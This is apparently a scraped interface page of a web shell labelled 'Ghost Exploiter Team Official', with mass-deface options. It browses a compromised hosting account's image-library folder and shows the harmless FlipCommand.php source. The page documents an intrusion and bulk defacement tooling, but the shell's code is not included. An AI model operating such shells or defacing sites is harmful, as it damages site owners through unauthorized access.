webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
intervention
/
image
/
src
/
Intervention
/
Image
/
Gd
/
Commands
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
BackupCommand.php
0.535KB
edt
ren
BlurCommand.php
0.528KB
edt
ren
BrightnessCommand.php
0.48KB
edt
ren
ColorizeCommand.php
0.821KB
edt
ren
ContrastCommand.php
0.476KB
edt
ren
CropCommand.php
1.216KB
edt
ren
DestroyCommand.php
0.551KB
edt
ren
FillCommand.php
1.957KB
edt
ren
FitCommand.php
1KB
edt
ren
FlipCommand.php
0.908KB
edt
ren
GammaCommand.php
0.467KB
edt
ren
GetSizeCommand.php
0.508KB
edt
ren
GreyscaleCommand.php
0.399KB
edt
ren
HeightenCommand.php
0.782KB
edt
ren
InsertCommand.php
1.105KB
edt
ren
InterlaceCommand.php
0.458KB
edt
ren
InvertCommand.php
0.381KB
edt
ren
LimitColorsCommand.php
1.339KB
edt
ren
MaskCommand.php
2.425KB
edt
ren
OpacityCommand.php
0.744KB
edt
ren
PickColorCommand.php
0.985KB
edt
ren
PixelCommand.php
0.654KB
edt
ren
PixelateCommand.php
0.477KB
edt
ren
ResetCommand.php
0.944KB
edt
ren
ResizeCanvasCommand.php
2.806KB
edt
ren
ResizeCommand.php
2.301KB
edt
ren
RotateCommand.php
0.751KB
edt
ren
SharpenCommand.php
0.763KB
edt
ren
TrimCommand.php
4.976KB
edt
ren
WidenCommand.php
0.776KB
edt
ren
<?php namespace Intervention\Image\Gd\Commands; class FlipCommand extends ResizeCommand { /** * Mirrors an image * * @param \Intervention\Image\Image $image * @return boolean */ public function execute($image) { $mode = $this->argument(0)->value('h'); $size = $image->getSize(); $dst = clone $size; switch (strtolower($mode)) { case 2: case 'v': case 'vert': case 'vertical': $size->pivot->y = $size->height - 1; $size->height = $size->height * (-1); break; default: $size->pivot->x = $size->width - 1; $size->width = $size->width * (-1); break; } return $this->modify($image, 0, 0, $size->pivot->x, $size->pivot->y, $dst->width, $dst->height, $size->width, $size->height); } }
<=Back
Liking